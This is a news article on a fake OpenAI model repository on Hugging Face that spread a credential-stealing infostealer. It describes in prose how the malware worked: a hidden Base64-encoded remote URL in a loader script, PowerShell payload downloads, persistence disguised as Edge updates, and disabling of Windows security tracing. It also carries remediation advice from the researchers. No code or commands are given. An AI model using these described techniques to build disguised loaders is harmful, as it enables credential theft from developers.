thailandai.news
  • AI News(International)
  • Thailand AI News
  • Ai Platforms/Apps
  • AI Startups
  • Ai Resources
    • AI Companies/Engineers
    • AI Computers and Hardware’s
    • Ai Training
    • AI Events
    • Thailand AI PR News
    • Ai Apps Listings
Friday, May 15, 2026
thailandai.news
The Only Artificial Intelligence (AI) News and Resource Platform in Asia
  • AI News(International)
  • Thailand AI News
  • Ai Platforms/Apps
  • AI Startups
  • Ai Resources
    • AI Companies/Engineers
    • AI Computers and Hardware’s
    • Ai Training
    • AI Events
    • Thailand AI PR News
    • Ai Apps Listings
thailandai.news
thailandai.news
  • AI News(International)
  • Thailand AI News
  • Ai Platforms/Apps
  • AI Startups
  • Ai Resources
    • AI Companies/Engineers
    • AI Computers and Hardware’s
    • Ai Training
    • AI Events
    • Thailand AI PR News
    • Ai Apps Listings
Copyright 2025 - All Right Reserved
AI News(International)

Fake OpenAI Model Hosted on Hugging Face Spreads Malware Panic

by Nikhil Prasad May 15, 2026
written by Nikhil Prasad May 15, 2026
2

What To Know

  • In the midst of growing trust in public AI repositories, this AI News report highlights how cybercriminals are now weaponizing artificial intelligence development platforms as part of sophisticated supply-chain attacks targeting valuable enterprise environments.
  • The malicious listing also surged to the top of Hugging Face’s trending section, gaining 667 likes within less than 18 hours, a suspiciously rapid rise that now appears to have been manipulated to increase visibility and lure additional victims.

AI News: The rapid rise of open-source artificial intelligence platforms has delivered incredible opportunities for developers worldwide, but a shocking new cybersecurity incident is now exposing the darker side of the booming AI ecosystem. Researchers have revealed that a malicious repository hosted on Hugging Face successfully impersonated an official OpenAI release and secretly distributed credential-stealing malware to unsuspecting users across the globe.

Fake OpenAI-themed AI model on Hugging Face secretly infected users with credential-stealing malware
Image Credit: Thailand AI News

The fraudulent repository, named “Open-OSS/privacy-filter,” was carefully designed to resemble a legitimate OpenAI project called Privacy Filter. Security experts from HiddenLayer disclosed that the attackers copied the original project’s model card almost word for word, creating a convincing trap for developers, AI enthusiasts, and corporate users. In the midst of growing trust in public AI repositories, this AI News report highlights how cybercriminals are now weaponizing artificial intelligence development platforms as part of sophisticated supply-chain attacks targeting valuable enterprise environments.

What made the operation particularly alarming was the sheer scale of exposure before the repository was finally removed. HiddenLayer estimated the fake project accumulated approximately 244,000 downloads, although researchers warned that attackers may have artificially inflated the numbers to make the repository appear more popular and trustworthy. The malicious listing also surged to the top of Hugging Face’s trending section, gaining 667 likes within less than 18 hours, a suspiciously rapid rise that now appears to have been manipulated to increase visibility and lure additional victims.

Malware Hidden Inside AI Setup Instructions

Unlike traditional malware campaigns that rely heavily on phishing emails or malicious attachments, this attack exploited the trust developers place in open-source AI workflows. The repository’s README file looked nearly identical to the genuine OpenAI project documentation, but included dangerous setup instructions that deviated from the original release.

Victims were instructed to execute “start.bat” on Windows systems or run “python loader.py” on Linux and macOS machines. According to HiddenLayer, these instructions were the critical first step in triggering the malware infection chain.

Researchers explained that the loader.py script initially appeared harmless and resembled a normal AI model-loading utility. However, hidden within the code was a carefully concealed infection mechanism. The script disabled SSL verification protections, decoded a Base64-encoded URL connected to jsonkeeper.com, and then retrieved remote payload instructions directly from attacker-controlled infrastructure.

This allowed the threat actors to dynamically change malware payloads without modifying the repository itself, making the attack harder to detect and increasing its flexibility.

Infostealer Targeted Browsers and Crypto Wallets

Once activated on Windows systems, the malicious PowerShell commands downloaded additional payloads from external domains. The malware then established persistence by creating scheduled tasks disguised as legitimate Microsoft Edge update processes, enabling it to survive system reboots and remain hidden from many users.

The final malware payload was identified as a Rust-based infostealer designed to harvest sensitive data from infected machines. HiddenLayer stated that the malware specifically targeted Chromium-based browsers, Firefox-derived browsers, Discord local storage files, cryptocurrency wallets, FileZilla configurations, and extensive host system information.

Researchers further revealed that the malware attempted to disable Windows security protections, including the Antimalware Scan Interface and Event Tracing mechanisms, both of which are designed to help security tools identify suspicious activity.

The attack demonstrates how modern cybercriminals are increasingly shifting toward AI-related ecosystems where developers often execute unfamiliar scripts and dependencies with elevated trust levels.

AI Repositories Becoming a New Cybersecurity Battleground

Cybersecurity specialists have been warning for years that public AI model registries could become dangerous attack surfaces. Unlike traditional software repositories that mostly contain libraries and dependencies, AI repositories frequently include executable scripts, notebooks, model loaders, dependency installers, and setup instructions.

These peripheral components often receive less scrutiny from users eager to test new AI tools quickly.

HiddenLayer researchers noted that the compromised repository was not an isolated incident. The firm discovered six additional Hugging Face repositories containing nearly identical malicious loader logic and sharing the same infrastructure patterns.

The latest findings follow earlier cases involving poisoned AI software development kits, fake OpenClaw installers, and malicious Pickle-serialized model files capable of bypassing some platform scanning systems.

Industry analysts believe this trend could intensify as enterprises increasingly integrate AI development directly into corporate environments containing source code repositories, cloud credentials, sensitive datasets, and internal systems.

Traditional Security Tools Struggling Against AI Threats

Sakshi Grover, senior research manager for cybersecurity services at IDC, warned that conventional Software Composition Analysis tools were never designed to detect the type of malicious loader logic now appearing in AI repositories.

Traditional SCA platforms mainly inspect dependency manifests, container images, and software libraries, but often overlook dangerous scripts hidden within AI development workflows.

Grover also referenced IDC’s November 2025 FutureScape report, which predicted that by 2027, approximately 60 percent of agentic AI systems would require detailed bills of materials. Such documentation could help organizations track AI artefacts, approved versions, executable components, and trusted origins.

Security experts now argue that AI governance frameworks may soon become as important as traditional software supply-chain security programs.

Urgent Warnings for Potential Victims

HiddenLayer strongly advised anyone who cloned the fake Open-OSS/privacy-filter repository and executed its files on Windows systems to immediately treat those machines as fully compromised. Researchers recommended complete system re-imaging as the safest remediation approach.

The company also warned that browser sessions should be considered stolen even if passwords were not locally stored. Session cookies harvested by infostealers can sometimes allow attackers to bypass multi-factor authentication protections and hijack active accounts.

Hugging Face has since confirmed that the malicious repository has been removed from its platform, but the incident has already intensified concerns surrounding the growing cybersecurity risks hidden inside the exploding AI development ecosystem.

As artificial intelligence adoption accelerates worldwide, experts warn that attackers are no longer simply targeting end users. Instead, they are actively infiltrating the trusted workflows developers rely upon every day, potentially turning AI innovation platforms into silent gateways for devastating cyber intrusions.

For the latest on AI-based cybercrimes, keep on logging to Thailand AI News.

Share 0 FacebookTwitterPinterestThreadsBlueskyEmail
Nikhil Prasad

Dr. Nikhil Prasad is a multifaceted entrepreneur and consultant specializing in public relations, business strategy, and independent medical research. He is also an expert herbalist and phytochemical specialist, a certified gemologist, a passionate food connoisseur, and a seasoned writer contributing to numerous international publications, newswire services, and his own media platforms. He is typically based in one of several global hubs, including Sydney, New York, Shanghai, Mumbai, or Bangkok.

previous post
Clio Legal AI Surge Hits US$500M

You may also like

Clio Legal AI Surge Hits US$500M

May 14, 2026

OpenAI Unleashes AI Voice Translation Revolution

May 11, 2026

DeepSeek Sparks New AI Price War with Massive...

April 27, 2026

Musk’s SpaceX Targets $60B Cursor AI Power Grab

April 22, 2026

Alibaba Unveils Meoo No-Code AI App Builder

April 21, 2026

Google’s Gemini Gets Personal with AI Image Magic

April 20, 2026

India’s Emergent Launches Wingman AI Agent to Compete...

April 19, 2026

Chrome Gets AI Skills to Supercharge Workflows

April 15, 2026

LiteLLM Hack Fallout Hits AI Star Mercor Hard

April 2, 2026

OpenAI Shutdown of Sora Signals AI Video Reality...

March 30, 2026

Recent Posts

  • Fake OpenAI Model Hosted on Hugging Face Spreads Malware Panic
  • Clio Legal AI Surge Hits US$500M
  • Thailand Targets AI Risks Facing Children
  • AI Startup Vapi Explodes After Amazon Ring Deal
  • OpenAI Unleashes AI Voice Translation Revolution

Recent Comments

No comments to show.

Social Connect

Facebook Twitter Instagram Pinterest Youtube Twitch

Recent Posts

  • Fake OpenAI Model Hosted on Hugging Face Spreads Malware Panic

  • Clio Legal AI Surge Hits US$500M

  • Thailand Targets AI Risks Facing Children

  • AI Startup Vapi Explodes After Amazon Ring Deal

  • OpenAI Unleashes AI Voice Translation Revolution

Categories

  • AI Computers and Hardware's (1)
  • AI News(International) (78)
  • Ai Platforms/Apps (26)
  • Ai Resources (3)
    • AI Events (2)
  • AI Startups (12)
  • Thailand AI News (106)
  • Thailand AI PR News (13)

The Only Artificial Intelligence (AI) News and Resource Platform in Asia

Facebook Twitter Youtube Linkedin Envelope Rss

Demo

    • GEO DEMO - drive
    • GEO Demo - yt

Useful Links

    • AI News (International)
    • Thailand Ai News
    • AI Platform/Apps
    • AI Startups
    • AI Companies/Engineers
    • AI Computers/Hardwares
    • AI Training
    • Ai Events
    • AI Listing
RSS Feed Verified RSS Feed Atom Feed Verified Atom Feed Follow on Feedly

Edtior's Picks

Fake OpenAI Model Hosted on Hugging Face Spreads Malware Panic
Clio Legal AI Surge Hits US$500M
Thailand Targets AI Risks Facing Children

Latest Articles

Fake OpenAI Model Hosted on Hugging Face Spreads Malware Panic
Clio Legal AI Surge Hits US$500M
Thailand Targets AI Risks Facing Children
AI Startup Vapi Explodes After Amazon Ring Deal

©2025  Thailand Ai News. All Right Reserved. 

  • Home
  • About
  • Authors
  • Copyright Policy
  • Legal Disclaimer
  • Privacy Policy
  • Terms and Conditions of Use
thailandai.news
  • AI News(International)
  • Thailand AI News
  • Ai Platforms/Apps
  • AI Startups
  • Ai Resources
    • AI Companies/Engineers
    • AI Computers and Hardware’s
    • Ai Training
    • AI Events
    • Thailand AI PR News
    • Ai Apps Listings